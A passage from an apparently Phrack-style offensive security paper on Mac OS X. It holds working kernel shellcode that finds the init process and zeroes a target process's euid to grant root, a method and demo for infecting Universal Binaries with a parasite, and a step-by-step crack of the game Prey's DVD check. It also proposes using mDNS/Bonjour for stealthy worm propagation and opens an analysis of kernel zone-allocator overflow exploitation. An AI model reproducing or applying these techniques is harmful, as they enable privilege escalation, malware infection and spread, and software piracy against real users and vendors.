        __asm__ volatile ("movl %%gs:%P1,%0"                            \
                : "=r" (ret)                                            \
                : "i" (offsetof(cpu_data_t,member)));                   \
        return ret;

When our code is executing in kernel space the gs selector can be used
to access our cpu_data struct. The first element of this struct
contains a pointer to the struct itself, so we no longer need to
use gs after this.

The first objective we will look at is the ability to find the
init process (pid=1) via this struct. Since our code may not
be running with an associated user space thread, we cannot count
on the uthread struct being populated in our thread_t struct.
An example of this might be when we exploit a network stack or
kernel extension.

The first step we must make to find the init process struct
is to retrieve the pointer to our thread_t struct.

We can do this by simply retrieving the pointer at gs:0x04.
The following instructions will achieve this:

        xor     ebx,ebx				;# zero ebx
        mov     eax,[gs:0x04 + ebx]             ;# thread_t.

After these instructions are executed, we have a pointer to 
our thread struct in eax. The thread struct is defined in 
osfmk/kern/thread.h. A portion of this struct is shown below:

struct thread {
        queue_chain_t   links;          /* run/wait queue links */
        run_queue_t     runq;   /* run queue thread is on SEE BELOW */
        wait_queue_t    wait_queue;  /* wait queue we are currently on */
        event64_t               wait_event;       /* wait queue event */
        integer_t               options;/* options set by thread itself */
  /* Data used during setrun/dispatch */
        timer_data_t            system_timer;  /* system mode timer */
        processor_set_t         processor_set;/* assigned processor set */
        processor_t bound_processor; /* bound to a processor? */
        processor_t last_processor;     /* processor last dispatched on */
        uint64_t    last_switch;        /* time of last context switch */
	void                                    *uthread;

This struct, again, contains many fields which are useful 
for our shellcode. However, in this case we are trying to
find the proc struct. Because we might not necessarily 
already have a uthread associated with us, as mentioned 
earlier, we must look elsewhere for a list of tasks to 
locate init (launchd). 

The next step in this process is to retrieve the 
"last_processor" element from our thread_t struct.
We do this using the following instructions: 

        mov     bl,0xf4
        mov     ecx,[eax + ebx]                 ;# last_processor

The last_processor pointer points to a processor 
struct as the name suggests ;) We can walk from the
last_processor struct back to the default pset in 
order to find the pset which contains init.

        mov     eax,[ecx]                       ;# default_pset + 0xc

We then retrieve the task head from this struct.

        push    word 0x458
        pop     bx
        mov     eax,[eax + ebx]                 ;# tasks head.

And retrieve the bsd_info element of the task.
This is a proc struct pointer.

        push    word 0x19c
        pop     bx
        mov     eax,[eax + ebx]                 ;# get bsd_info

The proc struct is defined in xnu/bsd/sys/proc_internal.h.
The first element of the proc struct is:

        LIST_ENTRY(proc) p_list;        /* List of all processes. */

We can walk this list o find a particular process that we want. 
For most of our code we will start with a pointer to the init 
process (launchd on Mac OS X). This process has a pid of 1.

To find this we simply walk the list checking the pid field 
at offset 36. The code to do this is as follows:

        mov     eax,[eax+4]                     ;# prev         
        mov     ebx,[eax + 36]                  ;# pid
        dec     ebx
        test    ebx,ebx                         ;# if pid was 1
        jnz     next_proc
;#      eax = struct proc *init;

Now that we have developed code which will retrieve a pointer
to the proc struct for the init process, we can look at some 
of the things that we can accomplish using this pointer.

The first thing which we will look at is simply rewriting the 
privilege escalation code listed earlier. Our new version of 
this code will not require any help from userspace (sysctl etc).

I think the below code is fairly self explanatory.

%define PID 1337

        mov     eax,[eax + 4]                   ;# eax = next proc
        mov     ebx,[eax + 36]                  ;# pid
        cmp     bx,PID
        jnz     find_pid
        mov     ecx, [eax + 8]          ;# ecx = ucred
        xor     eax,eax
        mov     [ecx + 12], eax         ;# zero out the euid

As you can see the cpu_data struct opens up many possibilities 
for our shellcode. Hopefully I will have time to go into some 
of these in a future paper.

--[ 6 - Misc Rootkit Techniques

In this section I will run over a few short pieces of 
information which might be relevant to someone who is 
developing a rootkit for Mac OS X. I didn't really have 
another place to put this stuff, so this will have to do.

The first thing to note is that an API exists [21] for 
executing userspace applications from kernelspace. This 
is called the Kernel User Notification Daemon. This is 
implemented using a mach port which the kernel uses to 
communicate  with a userspace daemon named kuncd.

The file xnu/osfmk/UserNotification/UNDRequest.defs 
contains the Mach Interface Generator (MIG) interface
definitions for the communication with this daemon.

The mach port is called: 
"[UNC]Notifications" and is
registered by the daemon /usr/libexec/kuncd.

Here is an example of how to use this interface 
programmatically. The interface allows you to display
messages via the GUI to the user, and also run any 

kern_return_t ret;
ret = KUNCExecute(
ret = KUNCExecute(

There may be a situation where you wish code to be executed on all the 
processors on a system. This may be something like updating the IDT / MSR 
and not wanting a processor to miss out on it.

The xnu kernel provides a function for this. The comment and prototype 
explain this a lot better than I can. So here you go:

 * All-CPU rendezvous:
 *      - CPUs are signalled,
 *      - all execute the setup function (if specified),
 *      - rendezvous (i.e. all cpus reach a barrier),
 *      - all execute the action function (if specified),
 *      - rendezvous again,
 *      - execute the teardown function (if specified), and then
 *      - resume.
 * Note that the supplied external functions _must_ be reentrant and aware
 * that they are running in parallel and in an unknown lock context.

mp_rendezvous(void (*setup_func)(void *),
              void (*action_func)(void *),
              void (*teardown_func)(void *),
              void *arg)

The code for the functions related to this are stored in 

--[ 7 - Universal Binary Infection

The Mach-O object format is used on operating systems which have
a kernel based on Mach. This is the format which is used by 
Mac OS X. Significant work has already been done regarding the
infection of this format. The papers [12] and [13] show some of
this. Mach-O files can be identified by the first four bytes of 
the file which contain the magic number 0xfeedface.

Recently Mac OS X has moved from the PowerPC platform to Intel 
architecture. This move has caused a new binary format to be 
used for most of the applications on Mac OS X 10.4. The Universal
Binary format is defined in the Mach-O Runtime reference from 
Apple. [4].

The Universal Binary format is a fairly trivial archive format
which allows for multiple Mach-O files of varying architecture
types to be stored in a single file. The loader on Mac OS X is 
able to interpret this file and distinguish which of the Mach-O
files inside the archive matches the architecture type of the 
current system. (We'll look at this a little more later.)

The structures used by Mac OS X to define and parse Universal
binaries are contained in the file /usr/include/mach-o/fat.h.

Universal binaries are recognizable, again, by the magic number
in the first four bytes of the file. Universal binaries begin 
with the following header:

struct fat_header {
	uint32_t        magic;          /* FAT_MAGIC */
	uint32_t        nfat_arch;      /* number of structs that follow */

The magic number on a universal binary is as follows:

#define FAT_MAGIC       0xcafebabe
#define FAT_CIGAM       0xbebafeca      /* NXSwapLong(FAT_MAGIC) */

Either FAT_MAGIC or FAT_CIGAM is used depending on the endian of
the file/system.

The nfat_arch field of this structure contains the number of 
Mach-O files of which the archive is comprised. On a side note
if you set this high enough to wrap, just about every debugging
tool on Mac OS X will crash, as demonstrated below:

-[nemo@fry:~]$ printf "\xca\xfe\xba\xbe\x66\x66\x66\x66" > file
-[nemo@fry:~]$ otool -tv file
Segmentation fault

For each of the Mach-O files in the Universal binary there 
is also a fat_arch structure.

This structure is shown below:

struct fat_arch {
        cpu_type_t      cputype;     /* cpu specifier (int) */
        cpu_subtype_t   cpusubtype;  /* machine specifier (int) */
        uint32_t        offset;      /* file offset to this object file */
        uint32_t        size;        /* size of this object file */
        uint32_t        align;       /* alignment as a power of 2 */

The fat_arch structure defines the architecture type of the
Mach-O file, as well as the offset into the Universal binary
in which it is stored. It also contains the alignment of the
architecture for the particular file, expressed as a power
of 2.

The diagram below describes the layout of a typical Universal

|0xcafebabe                                       |
|   struct fat_header                             |
| fat_arch struct #1                              |------------+
|-------------------------------------------------|            |
| fat_arch struct #2                              |---------+  |
|-------------------------------------------------|         |  |
| fat_arch struct #n                              |------+  |  |
|0xfeedface                                       |      |  |
|                                                 |      |  |
|    Mach-O File #1                               |      |  |
|                                                 |      |  |
|                                                 |      |  |
|0xfeedface                                       |      |
|                                                 |      |
|    Mach-O File #2                               |      |
|                                                 |      |
|                                                 |      |
|0xfeedface                                       |
|                                                 |
|    Mach-O file #n                               |
|                                                 |
|                                                 |

Here you can see the file beginning with a fat_header
structure. Following this are n * fat_arch structures
each defining the offset into the file to find the
particular Mach-O file described by the structure.
Finally n * Mach-O files are appended to the structs.

Before I run through the method for infecting Universal
binaries I will first show how the kernel loads them.

The file:  xnu/bsd/kern/kern_exec.c contains the code
shown in this section.

First the kernel sets up a NULL terminated array of 
execsw structs.  Each of these structures contain a 
function pointer to an  image activator / parser for 
the different image types, as well as a relevant string 

The definition and declaration of this array is shown 

 * Our image activator table; this is the table of the image types we are
 * capable of loading.  We list them in order of preference to ensure the
 * fastest image load speed.
 * XXX hardcoded, for now; should use linker sets
struct execsw {
        int (*ex_imgact)(struct image_params *);
        const char *ex_name;
} execsw[] = {
        { exec_mach_imgact,             "Mach-o Binary" },
        { exec_fat_imgact,              "Fat Binary" },
        { exec_powerpc32_imgact,        "PowerPC binary" },
#endif  /* IMGPF_POWERPC */
        { exec_shell_imgact,            "Interpreter Script" },
        { NULL, NULL}

The following code from the execve() system call loops 
through each of the elements in this array and calls 
the function pointer for each one. A pointer to the 
start of the image is passed to it. 

execve(struct proc *p, struct execve_args *uap, register_t *retval)

        for(i = 0; error == -1 && execsw[i].ex_imgact != NULL; i++) {

                error = (*execsw[i].ex_imgact)(imgp);

Each of the functions parses the file to determine
if the file is of the appropriate architecture type.
The function which is responsible for matching and
parsing Universal binaries is the "exec_fat_imgact"

The declaration of this function is below:

 * exec_fat_imgact
 * Image activator for fat 1.0 binaries.  If the binary is fat, then we
 * need to select an image from it internally, and make that the image
 * we are going to attempt to execute.  At present, this consists of
 * reloading the first page for the image with a first page from the
 * offset location indicated by the fat header.
 * Important:   This image activator is byte order neutral.
 * Note:    If we find an encapsulated binary, we make no assertions
 *          about its  validity; instead, we leave that up to a rescan
 *          for an activator to claim it, and, if it is claimed by one,
 *          that activator is responsible for determining validity.
static int
exec_fat_imgact(struct image_params *imgp)

The first thing this function does is test the 
magic number at the top of the file. The following
code does this.

        /* Make sure it's a fat binary */
        if ((fat_header->magic != FAT_MAGIC) &&
            (fat_header->magic != FAT_CIGAM)) {
                error = -1;
                goto bad;

The fatfile_getarch_affinity() function is then 
called to search the universal binary for a 
Mach-O file with the appropriate architecture 
type for the system.

   /* Look up our preferred architecture in the fat file. */
        lret = fatfile_getarch_affinity(imgp->ip_vp,
                                        (p->p_flag & P_AFFINITY));

This function is defined in the file: 

                struct vnode            *vp,
                vm_offset_t             data_ptr,
                struct fat_arch *archret,
                int                             affinity)

This function searches each of the Mach-O files within the 
Universal binary. A host has a primary and secondary architecture. 
If during this search, a Mach-O file is found which matches
the primary architecture type for the host, this file is 
used. If, however, the primary architecture type is not 
found, yet the secondary type is found, this will be used.
This is useful when infecting this format.

Once an appropriate Mach-O file has been located the imgp
ip_arch_offset and ip_arch_size attributes are updated to
reflect the new position in the file.

/* Success.  Indicate we have identified an encapsulated binary */
error = -2;
imgp->ip_arch_offset = (user_size_t)fat_arch.offset;
imgp->ip_arch_size = (user_size_t)fat_arch.size;

After this fatfile_getarch_affinity() simply returns and lets
execve() continue walking the execsw[] struct array to find 
an appropriate loader for the new file.

This logic means that it does not really matter if the 
true architecture type of the file matches up with the 
architecture specified in the fat_header struct within
the Universal binary. Once a Mach-O file is chosen it will
be treated as a fresh binary.

The method which I propose to infect Universal binaries 
utilizes this behavior. A breakdown of this method is
as follows:

1) Determine the primary and secondary architecture types
   for the host machine.
2) Parse the fat_header struct of the host binary.
3) Walk through the fat_arch structs and locate the 
   struct for the secondary architecture type.
4) Check that the size of the parasite is smaller than the 
   secondary architecture Mach-O file in the Universal binary.
5) Copy the parasite binary directly over the secondary arch
   binary inside the universal binary.
6) Locate the primary architecture's fat_arch structure.
7) Modify the architecture type field in this structure to be

Now when the binary is executed, the primary architecture 
is not found. Due to this, the secondary architecture is 
used. The imgp is set to point to the offset in the file
containing our parasite, and this is executed as expected.
The parasite then opens it's own binary (which is quite 
possible on Mac OS X) and performs a linear search for 
0xdeadbeef. It then modifies this value, changing it back
to the primary architecture type and execve()'s it's own file.

Some sample code has been provided with this paper that 
demonstrates this method on Intel architecture. The code 
unipara.c will copy an Intel architecture Mach-O file
over the PowerPC Mach-O file inside a Universal binary.
After infection has occurred the size of the host file
remains unchanged.

-[nemo@fry:~/code/unipara]$ ./unipara host parasite
-[nemo@fry:~/code/unipara]$ ./host
uid=501(nemo) gid=501(nemo) 
-[nemo@fry:~/code/unipara]$ wc -c host
   43028 host
-[nemo@fry:~/code/unipara]$ ./unipara parasite host
[+] Initiating infection process.
[+] Found: 2 arch structs.
[+] We are good to go, attaching parasite.
[+] parasite implanted at offset: 0x6000
[+] Switching arch types to execute our parasite.
-[nemo@fry:~/code/unipara]$ wc -c host
   43028 host
-[nemo@fry:~/code/unipara]$ ./host
Hello, World!
uid=501(nemo) gid=501(nemo) 

If residency is required after the payload has already been
executed, the parasite can simply fork() before modifying 
it's binary. The parent process can then execve() while the child
waits and then returns the architecture type to 0xdeadbeef.

--[ 8 - Cracking Example - Prey

Recently, during an extra long stopover in LAX airport (the most
boring airport in the entire world) I decided I would pass the 
time by playing the game "Prey" which I had installed onto my 

To my horror, when I tried to start up my game, I was greeted 
with the following error message:

"Please insert the disc "Prey" or press Quit."
"Veuillez inserer le disque "Prey" ou appuyer sur Quitter."
"Bitte legen Sie "Prey" ins Laufwerk ein oder klicken Sie
auf Beenden."

Since I had nothing better to do, I decided to spend some 
time removing this error message. First things first I
determined the object format of the executable file.

-[nemo@fry:/Applications/Prey/]$ file Prey
Prey: Mach-O universal binary with 2 architectures
Prey (for architecture ppc):    Mach-O executable ppc
Prey (for architecture i386):   Mach-O executable i386

The Prey executable is a Universal binary containing a 
PowerPC and an i386 Mach-O binary. 

Next I ran the otool -o command to determine if the code
was written in Objective-C. The output from this command
shows that an Objective-C segment is present in the file.

-[nemo@largeprompt]$ otool -o Prey | head -n 5
Objective-C segment
Module 0x27ef458
    version 6
           size 16

I then used the "class-dump" command [14] to dump the 
class definitions from the file. Probably the most
interesting of which is shown below:

	@interface DOOMController (Private)
	- (void)quakeMain;
	- (BOOL)checkRegCodes;
	- (BOOL)checkOS;
	- (BOOL)checkDVD;

Most games on Mac OS X are 10 years behind their Windows
counterparts when it comes to copy protection. Typically
the developers don't even strip the file and symbols are 
still present. Because of this fact, I fired up gdb and 
put a breakpoint on the main function.

	(gdb) break main
	Breakpoint 1 at 0x96b64

However when I executed the file the error message was
displayed prior to my breakpoint in main being reached.
This lead me to the conclusion that a constructor 
function was responsible for check. 

To validate this theory I ran the command "otool -l" on
the binary to list the load commands present in the file.
(The Mach-O Runtime Document [4] explains the load_command
struct clearly).

Each section in the Mach-O file has a "flags" value 
associated with it. This describes the purpose of the 
section. Possible values for this flags variable are
found in the file: /usr/include/mach-o/loader.h.

The value which represents a constructor section is 
defined as follows:

/* section with only function pointers for initialization*/
#define S_MOD_INIT_FUNC_POINTERS        0x9     

Looking through the "otool -l" output there is only one
section which has the flags value: 0x9. This section is
shown below:

  sectname __mod_init_func
   segname __DATA
      addr 0x00515cec
      size 0x00000380
    offset 5328108
     align 2^2 (4)
    reloff 0
    nreloc 0
     flags 0x00000009
 reserved1 0
 reserved2 0

Now that the virtual address of the constructor section
for this application was known, I simply fired up gdb
again and put breakpoints on each of the pointers 
contained in this section.

(gdb) x/x 0x00515cec
0x515cec <_ZTI14idSIMD_Generic+12>:     0x028cc8db
0x515cf0 <_ZTI14idSIMD_Generic+16>:     0x00495852
0x515cf4 <_ZTI14idSIMD_Generic+20>:     0x0049587c

(gdb) break *0x028cc8db
Breakpoint 1 at 0x28cc8db
(gdb) break *0x00495852
Breakpoint 2 at 0x495852
(gdb) break *0x0049587c
Breakpoint 3 at 0x49587c

I then executed the program. As expected the first break point
was hit before the error message box was displayed.

(gdb) r
Starting program: /Applications/Prey/ 

Breakpoint 1, 0x028cc8db in dyld_stub_log10f ()
(gdb) continue

I then continued execution and the error message appeared. This
happened before the second breakpoint was reached. This indicated
that the first pointer in the __mod_init_func was responsible for 
the DVD checking process.

In order to validate my theory I restarted the process. This time 
I deleted all breakpoints except the first one.

(gdb) delete
Delete all breakpoints? (y or n) y
(gdb) break *0x028cc8db
Breakpoint 4 at 0x28cc8db

(gdb) r
Starting program: /Applications/Prey/ 
Reading symbols for shared libraries . done

Once the breakpoint is reached, I simply "return" from the 
constructor, without testing for the DVD.

Breakpoint 4, 0x028cc8db in dyld_stub_log10f ()
(gdb) ret
Make selected stack frame return now? (y or n) y
#0  0x8fe0fcc4 in  _dyld__ZN16ImageLoaderMachO16doInitialization... ()
And then continue execution.

(gdb) c

The error message was gone and Prey started up as if the DVD 
was in the drive, SUCCESS! After playing the game for about 10
minutes and running through the same boring corridor over and 
over again I decided it was more fun to continue cracking the
game than to actually play it. I exited the game and returned 
to my shell.

In order to modify the binary I used the HT Editor. [15] 
Before I could use HTE to modify this file however, I had to
extract the appropriate architecture for my system from the
Universal binary. I accomplished this using the ditto command
as follows.

-[nemo@fry:/Prey/]$ ditto -arch i386 Prey Prey.i386
-[nemo@fry:/Prey/]$ cp Prey Prey.backup
-[nemo@fry:/Applications/Prey/]$ cp Prey.i386 Prey

I then loaded the file in HTE. I pressed F6 to select the mode
and chose the Mach-O/header option. I then scrolled down to
find the __mod_init_func section. This is shown as follows:

**** section 3 ****                                              
section name                                      __mod_init_func         
segment name                                      __DATA                  
virtual address                                   00515cec                
virtual size                                      00000380                
file offset                                       00514cec                
alignment                                         00000002                
relocation file offset                            00000000                
number of relocation entries                      00000000                
flags                                             00000009                
reserved1                                         00000000                
reserved2                                         00000000              

In order to skip the first constructor I simply added four
bytes to the virtual address field, and subtracted four 
bytes from the size. I did this by pressing F4 in HTE and 
typing the values. Here is the new values:

**** section 3 ****                                             
section name                                      __mod_init_func         
segment name                                      __DATA                  
virtual address                                   00515cf0 <== += 4     
virtual size                                      0000037c <== -= 4     
file offset                                       00514cec                
alignment                                         00000002                
relocation file offset                            00000000                
number of relocation entries                      00000000                
flags                                             00000009                
reserved1                                         00000000                
reserved2                                         00000000               

I then saved this new binary and executed it, again Prey
started up fine without mentioning the missing DVD.

Finally I repeated this process for the PowerPC binary
and packed the two back together into a Universal binary
using the lipo command.

--[ 9 - Passive malware propagation with mDNS

As I'm sure all of you are aware, the only reason for the 
lack of malware on Mac OS X is due to the lack of market
share (And therefore lack of people caring). 

In this section I propose a way to remedy this. This method
utilizes one of the default services which ships on Mac OS X
10.4 at the time of writing: mDNSResponder. 

The mDNSResponder service is an implementation of the 
multicast DNS protocol. This protocol is documented
thoroughly by several of the documents linked from [17].
Also if you're interested in the protocol it makes sense
to read the RFC [18].

At a packet level the multicast DNS protocol is very similar
to regular DNS. It also serves a similar (yet different) 
purpose: mDNS is used to create a way for hosts on a LAN
to automagically configure their network settings and begin
communication without a DHCP server on the network. It is 
also designed to allow the services on a network to be 

Recently, mDNS implementations have been shipping for a large
variety of operating systems, including Mac OS X, Vista, Linux
and a variety of hardware devices such as printers. The mDNS
implementation which is packaged with Mac OS X is called 

Bonjour contains a useful API for registering and browsing
services advertised by mDNS. The daemon mDNSResponder is
responsible for all the network communication via a mach port
named "" that is made available to the 
system for communication with the daemon. The documentation
for the API which is used to manipulate this daemon is found 
at [19]. 

The command line tool /usr/bin/mdns also exists for manipulating 
the mDNSResponder daemon directly [20].  This tool has the following 

-[nemo@fry:~]$ mdns
mdns -E                  (Enumerate recommended registration domains)
mdns -F                      (Enumerate recommended browsing domains)
mdns -B        <Type> <Domain>        (Browse for services instances)
mdns -L <Name> <Type> <Domain>           (Look up a service instance)
mdns -R <Name> <Type> <Domain> <Port> [<TXT>...] (Register a service)
mdns -A                      (Test Adding/Updating/Deleting a record)
mdns -U                                  (Test updating a TXT record)
mdns -N                             (Test adding a large NULL record)
mdns -T                            (Test creating a large TXT record)
mdns -M      (Test creating a registration with multiple TXT records)
mdns -I   (Test registering and then immediately updating TXT record)

Here is an example demonstrating using this tool to look for SSH 

-[nemo@fry:~]$ mdns -B _ssh._tcp. 
Browsing for _ssh._tcp.local
Talking to DNS SD Daemon at Mach port 3843
Timestamp     A/R Flags Domain              Service Type     Instance Name
11:16:45.816  Add     1 local.              _ssh._tcp.               fry

As you can see, this functionality would be very useful for 
malware installed on a new host. 

Once a worm has compromised a new host, it must then scan for
new targets to attack. This scanning is one of the most common
ways for a worm to be detected on a network. In the case of 
Mac OS X, where a large amount of scanning would be required to
find a single target, this will more likely be the case. 

We can use the Bonjour API to wait silently for a service to 
advertise itself to our code, then infect the target as 
necessary. This will greatly reduce the network traffic 
required for worm propogation.

The header file which contains the definition for the structs
and functions needed is /usr/include/dns_sd.h. The functions
needed are contained within libSystem and are therefor linked with
almost every binary on the system. This is good news if you have
just infected a new process and wish to perform the mDNS lookup
from inside it's address space.

The Bonjour API allows us to register a service, enumerate 
domains as well as many other useful things. I will only 
focus on browsing for an instance of a particular type of 
service in this paper, however. This is a relatively 
straight forward process. 

The first function needed to find an instance of a service is the
DNSServiceBrowse() function (shown below).

DNSServiceErrorType DNSServiceBrowse ( 
    DNSServiceRef *sdRef, 
    DNSServiceFlags flags, 
    uint32_t interfaceIndex, 
    const char *regtype, 
    const char *domain, /* may be NULL */
    DNSServiceBrowseReply callBack, 
    void *context /* may be NULL */

The arguments to this are fairly straight forward. We simply 
pass an uninitialized DNSServiceRef pointer, followed by an
unused flags argument. The interfaceIndex specifies the 
interface on which to perform the query. Setting this to 0 
results on this query broadcasting on all interfaces. The
 regtype field is used to specify the type of service we wish
to browse for. In our example we will search for ssh. So the 
string "_ssh._tcp" is used to specify ssh over tcp. Next the
domain argument is used to specify the logical domain we wish 
to browse. If this argument is NULL, the default domains are 
used. Finally a callback must be supplied in order to indicate
what to do once an instance is found. This function can include
our infection/propagation code. 

Once the call to DNSServiceBrowse() has been made, the function
DNSServiceProcessResult() must be used to begin processing.

This function simply takes the sdRef, initialized from the 
first call to DNSServiceBrowse(), and calls the callback 
function when results are received. It will block until 
finding an instance. 

Once a service is found, it must be resolved to an IP address
and port so it can be infected.

To do this the DNSServiceResolve() function can be used.
This function is very similar to the DNSServiceBrowse()
function, however a DNSServiceResolveReply() callback
is used. Also the name of the service must already be
known. The function prototype is as follows;

	DNSServiceErrorType DNSServiceResolve ( 
	    DNSServiceRef *sdRef, 
	    DNSServiceFlags flags, 
	    uint32_t interfaceIndex, 
	    const char *name, 
	    const char *regtype, 
	    const char *domain, 
	    DNSServiceResolveReply callBack, 
	    void *context /* may be NULL */

The callback for this function receives the following

	DNSServiceResolveReply resolve_target(
	    DNSServiceRef sdRef,
	    DNSServiceFlags flags,
	    uint32_t interfaceIndex,
	    DNSServiceErrorType errorCode,
	    const char *fullname,
	    const char *hosttarget,
	    uint16_t port,
	    uint16_t txtLen,
	    const char *txtRecord,
	    void *context

Once again we must call the DNSServiceProcessResult() 
function, passing the sdRef received from DNSServiceResolve
to begin processing. 

Once within the callback, the port which the service runs
on is passed in as a short in network byte order. 

Retrieving the IP address is simply a case of calling
gethostbyname() on the hosttarget argument.

I have included some code in the Appendix (discover.c)
which demonstrates this clearly. This code can sit in a
loop to enumerate each of the services and infect them.

Opensshd warez not included. ;-)

--[ 10 - Kernel Zone Allocator exploitation

A zone allocator is a memory allocator which is designed 
for efficient allocation of objects of identical size. 

In this section I will look at how the mach zone allocator,
(the zone allocator used by the XNU kernel) works. Then I 
will look at how an overflow into the pages used by the zone 
allocator can be exploited.

The source for the mach zone allocator is located in the file 

Some of objects in the XNU kernel which use the mach zone 
allocator for allocation are; The task structs, the thread 
structs, the pipe structs and the zone structs themselves.

A list of the current zones on the system can be retrieved 
from userspace using the host_zone_info() function. Mac OS X
ships with a tool which takes advantage of this:


This tool displays each of the zones and their element size,
current size, max size etc. Here is some sample output from
running this program.

elem    cur    max    cur    max   cur alloc alloc
zone name                size   size   size  #elts  #elts inuse  size count
zones                    80    11K    12K    152    153    95    4K    51  
vm.objects              136  3609K  3888K  27180  29274 21116    4K    30 C
vm.object.hash.entries   20   374K   512K  19176  26214 17674    4K   204 C
tasks                   432    59K   432K    141   1024   113   20K    47 C
threads                 868   329K  2172K    389   2562   295   56K    66 C
uthreads                296   114K   740K    396   2560   296   16K    55 C
alarms                   44     3K     4K     93     93     2    4K    93 C
load_file_server         36    56K   492K   1605  13994  1605    4K   113  
mbuf                    256     0K  1024K      0   4096     0    4K    16 C
socket                  344    38K  1024K    114   3048    75   20K    59 C

It also gives you a chance to see some of the different types
of objects which utilize the zone allocator.

Before I demonstrate how to exploit an overflow into these
zones, we will first look at how the zone allocator functions.

When the kernel wishes to start allocating objects within a zone
the zinit() function is first called. This function is used to
allocate the zone which will contain each member of that 
specific object type. The information about the newly created
zone needs a place to stay. The "struct zone" struct is used to
accommodate this information. The definition of this struct is 
shown below.

struct zone {
        int             count;          /* Number of elements used now */
        vm_offset_t     free_elements;
        decl_mutex_data(,lock)          /* generic lock */
        vm_size_t       cur_size;       /* current memory utilization */
        vm_size_t       max_size;       /* how large can this zone grow */
        vm_size_t       elem_size;      /* size of an element */
        vm_size_t       alloc_size;     /* size used for more memory */
        unsigned int
        /* boolean_t */ exhaustible :1, /* (F) merely return if empty? */
     /* boolean_t */ collectable :1, /* (F) garbage collect empty pages */
     /* boolean_t */ expandable :1,  /* (T) expand zone (with message)? */
        /* boolean_t */ allows_foreign :1,/* (F) allow non-zalloc space */
        /* boolean_t */ doing_alloc :1, /* is zone expanding now? */
   /* boolean_t */ waiting :1,     /* is thread waiting for expansion? */
/* boolean_t */ async_pending :1,   /* asynchronous allocation pending? */
        /* boolean_t */ doing_gc :1;    /* garbage collect in progress? */
        struct zone *   next_zone;      /* Link for all-zones list */
        call_entry_data_t       call_async_alloc;  
	/* callout for asynchronous alloc */
        const char      *zone_name;     /* a name for the zone */
#if     ZONE_DEBUG
        queue_head_t    active_zones;   /* active elements */
#endif  /* ZONE_DEBUG */

The first thing that the zinit() function does is check if there is
an existing zone in which to store the new zone struct. The 
global pointer "zone_zone" is used for this. If the mach zone
allocator has not yet been used, the zget_space() function is
used to allocate more space for the zones zone (zone_zone).

The code which performs this check is as follows:

        if (zone_zone == ZONE_NULL) {
                if (zget_space(sizeof(struct zone), (vm_offset_t *)&z)
                    != KERN_SUCCESS)
        } else
                z = (zone_t) zalloc(zone_zone);

If the zone_zone exists, the zalloc() function is used to 
retrieve an element from the zone. Each of the attributes
of this new zone is then populated.

        z->free_elements = 0;
        z->cur_size = 0;
        z->max_size = max;
        z->elem_size = size;
        z->alloc_size = alloc;
        z->zone_name = name;
        z->count = 0;
        z->doing_alloc = FALSE;
        z->doing_gc = FALSE;
        z->exhaustible = FALSE;
        z->collectable = TRUE;
        z->allows_foreign = FALSE;
        z->expandable  = TRUE;
        z->waiting = FALSE;
        z->async_pending = FALSE;

As you can see, The free_elements linked list is 
initialized to 0. The zone_init() function returns
a zone_t pointer which is used for each allocation
of new objects with zalloc(). Before returning 
zinit() uses the zalloc_async() function to allocate
and free a single element in the zone.

Now that the zone is set up, the zalloc() and zfree()
functions are used to allocate and free elements from 
the zone. Also zget() is used to perform a non-blocking
allocation from the zone.

Firstly I will look at the zalloc() function. zalloc()
is basically a wrapper function around the 
zalloc_canblock() function. 

The first thing zalloc_canblock() does is attempt to 
remove an element from the zone's free_elements list
and use it. The following macro (REMOVE_FROM_ZONE) is
responsible for doing this.

#define REMOVE_FROM_ZONE(zone, ret, type)                               \
MACRO_BEGIN                                                             \
        (ret) = (type) (zone)->free_elements;                           \
        if ((ret) != (type) 0) {                                        \
            if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0])) {      \
                panic("A freed zone element has been modified.\n");     \
            }                                                           \
            (zone)->count++;                                            \
            (zone)->free_elements = *((vm_offset_t *)(ret));            \
        }                                                               \
#else   /* MACH_ASSERT */

As you can see, this macro simply returns the 
free_elements pointer from the zone struct. It
also increments the count attribute and sets the 
free_elements attribute of the zone struct to
the "next" free element. It does this by 
dereferencing the current free elements address.
This shows that the first 4 bytes of an unused 
allocation in a zone is used as a pointer to the
next free element. This will come in handy to us 

The check is_kernel_data_addr() is used to make 
sure we haven't tampered with the list. The 
definition of this check is shown below:

#define is_kernel_data_addr(a)                                          \
  (!(a) || ((a) >= vm_min_kernel_address && !((a) & 0x3)))

const vm_offset_t vm_min_kernel_address = VM_MIN_KERNEL_ADDRESS;
#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)

As you can see this simply checks that the address is 
not 0, it is greater or equal to 0x1000 (which isn't 
a problem at all) and it's word aligned. This check does 
not really cause any trouble when exploiting an overflow
as you'll see later.

If there are no free elements in the list the 
doing_alloc attribute of the zone is checked.

This attribute is used as a lock. If a blocking 
allocation is performed the allocator will sleep until 
this is unset. 

Once it is ok to allocate an element the 
kernel_memory_allocate() function is used to
allocate one. The allocation is of a fixed
size for the zone. The kernel_memory_allocate() 
function is used at the base level of pretty 
much all the memory allocators present in the
XNU kernel. It basically just uses 
vm_page_alloc() to allocate pages. Once the
zone allocator successfully calls this function
zcram() is used to break the pages up into elements
and add them to the free_elements list. Each element 
is added in the same way zfree() does so now that 
I have looked at the allocation process I will take
show the workings of zfree().
The zfree() function is used to add an element back 
to the zone free_elements list. The first thing zfree()
does is to make sure that an element is not being zfree()'ed
which was never zalloc()'ed. This is done using the 
from_zone_map() macro. This macro is defined as follows.

#define from_zone_map(addr, size) \
        ((vm_offset_t)(addr) >= zone_map_min_address && \
	         ((vm_offset_t)(addr) + size -1) <  zone_map_max_address)

In the case of an overflow however, this check is not 
particularly important so I will move on.

Next the zfree() function (if zone debugging is enabled) will
run through and check that the element did not come from
a different zone to the one which has been passed to zfree().
If this is the case a kernel panic() is thrown, alerting
on what the problem was.

Next zfree() runs through all the free_elements in the zones 
list and calls the pmap_kernel_va() function. The code which 
does this is as follows.

     for (this = zone->free_elements;
	     this != 0;
	     this = * (vm_offset_t *) this)
		if (!pmap_kernel_va(this) || this == elem)

The pmap_kernel_va() check is shown below.

#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)
#define pmap_kernel_va(VA)      \
        (((VA) >= VM_MIN_KERNEL_ADDRESS) && ((VA) <= vm_last_addr))

The pmap_kernel_va check simply checks that the address
is greater than or equal to the VM_MIN_KERNEL_ADDRESS. 
This address is defined (above) as 0x1000, the start of 
the first page of valid kernel memory (straight after 
PAGEZERO). It then checks if the address is less than 
